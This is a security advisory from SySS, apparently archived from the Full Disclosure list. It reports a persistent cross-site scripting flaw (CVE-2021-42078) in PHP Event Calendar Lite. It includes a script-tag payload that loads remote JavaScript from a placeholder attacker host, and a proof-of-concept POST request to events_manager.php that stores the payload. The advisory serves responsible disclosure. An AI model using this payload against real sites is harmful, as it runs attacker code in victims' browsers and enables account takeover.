Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

[SYSS-2021-049] PHP Event Calendar - Persistent Cross-site Scripting (CVE-2021-42078)

Related Vulnerabilities: CVE-2021-42078  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="22"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#24">By Date</a>
<a href="23"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="22"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#24">By Thread</a>
<a href="23"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">[SYSS-2021-049] PHP Event Calendar - Persistent Cross-site Scripting (CVE-2021-42078)</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Maurizio Ruchay &lt;maurizio.ruchay () syss de&gt;


<em>Date</em>: Fri, 5 Nov 2021 07:09:40 +0100


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Advisory ID:               SYSS-2021-049
Product:                   PHP Event Calendar
Manufacturer:              Kayson Group Ltd.
Affected Version(s):       PHP Event Calendar Lite edition
Tested Version(s):         PHP Event Calendar Lite edition
Vulnerability Type:        Cross-site Scripting (CWE-79)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2021-08-09
Public Disclosure:         2021-11-04
CVE Reference:             CVE-2021-42078
Authors of Advisory:       Erik Steltzner, SySS GmbH
                           Maurizio Ruchay, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

PHP Event Calendar is a multi-user web application designed
to manage and publish calendar events.

The manufacturer describes the product as follows (see [1] and [2]):

"PHP Event Calendar features day, week, month, year, agenda, and
resource views. It includes built-in reminder support so you can
deliver full-featured event scheduling management systems in
the shortest possible time."

"PHP Event Calendar is a out-of-box web calendar/scheduler solution.
It will run on web servers that support PHP 5.3 and higher."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

</pre><tt>The title of a calendar event is vulnerable to persistent cross-site 
</tt><tt>scripting (XSS).
</tt><pre style="margin: 0em;">
</pre><tt>For example, the following title causes an event to be stored with a 
</tt><tt>prepared
</tt><tt>JavaScript code. As soon as some user opens the event in the detail 
</tt><tt>view, the
</tt><pre style="margin: 0em;">JavaScript code stored on the attacker server will be executed.

&lt;script src="http://&lt;attacking-machine&gt;/XSS.js"/&gt;

This can be exploited by an adversary in multiple ways. For example, to
perform actions on the page in the context of other users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Adding an event with a malicious title:

~~~
Request:
POST /server/ajax/events_manager.php HTTP/1.1
[...snip...]
title=%3Cscript+src%3D%22http%3A%2F%2F&lt;attacking-machine&gt;%2FXSS.js%22%2F%3E&amp;start-date=&lt;startDate&gt;
&amp;start-time=&lt;startTime&gt;&amp;end-date=&lt;endDate&gt;&amp;end-time=&lt;endTime&gt;&amp;location=&amp;url=&amp;description=
&amp;selected_calendars%5B%5D=1&amp;backgroundColor=%233a87ad&amp;imageName=&amp;free_busy=free
&amp;privacy=public&amp;update-event=&amp;currentView=

Response:
HTTP/1.1 200 OK
[...snip...]
~~~

When a victim opens the event in the detail view, the following request
loads the malicious code:

~~~
Request:
POST /server/ajax/events_manager.php HTTP/1.1
[...snip...]
eventID=11&amp;action=LOAD_SINGLE_EVENT_BASED_ON_EVENT_ID_PUBLIC

Response:
HTTP/1.1 200 OK
[...snip...]
{
     "id":"11",
     [...snip...]
     "title":"&lt;script src=\"http:\/\/&lt;attacking-machine&gt;\/XSS.js\"\/&gt;",
     "description":"",
     [...snip...]
}
~~~

As soon as the victim's browser renders this response, the malicious
script "XSS.js" is loaded and executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

To prevent cross-site scripting attacks, all user-provided input should be
validated, and control characters should be masked in a context-sensitive
manner.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-29: Vulnerability discovered
2021-08-09: Vulnerability reported to manufacturer
2021-11-04: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website for PHP Event Calendar
     <a rel="nofollow" href="https://phpeventcalendar.com/">https://phpeventcalendar.com/</a>
[2] Documentation Website for PHP Event Calendar
     <a rel="nofollow" href="https://phpeventcalendar.com/documentation/">https://phpeventcalendar.com/documentation/</a>
[3] SySS Security Advisory SYSS-2021-049

<a rel="nofollow" href="https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-049.txt">https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-049.txt</a>
[4] SySS Responsible Disclosure Policy
     <a rel="nofollow" href="https://www.syss.de/en/news/responsible-disclosure-policy/">https://www.syss.de/en/news/responsible-disclosure-policy/</a>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner and
Maurizio Ruchay of SySS GmbH.

E-Mail: erik.steltzner () syss de
Public Key:
<a rel="nofollow" href="https://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc">https://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc</a>
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: maurizio.ruchay () syss de
</pre><tt>Public Key: 
</tt><tt><a rel="nofollow" href="https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc">https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc</a>
</tt><pre style="margin: 0em;">Key ID: 0xC7D20E267F0FA978
Key Fingerprint: D506 AB5A FE3E 09AE FFBE  DEB2 C7D2 0E26 7F0F A978

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: <a rel="nofollow" href="http://creativecommons.org/licenses/by/3.0/deed.en">http://creativecommons.org/licenses/by/3.0/deed.en</a>



</pre><p><strong>Attachment:
<a href="att-24/OpenPGP_signature.bin"><tt>OpenPGP_signature</tt></a></strong>

<em>Description:</em> OpenPGP digital signature</p>
<pre style="margin: 0em;">
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="22"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#24">By Date</a>
<a href="23"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="22"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#24">By Thread</a>
<a href="23"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>[SYSS-2021-049] PHP Event Calendar - Persistent Cross-site Scripting (CVE-2021-42078)</strong> <em>Maurizio Ruchay (Nov 05)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started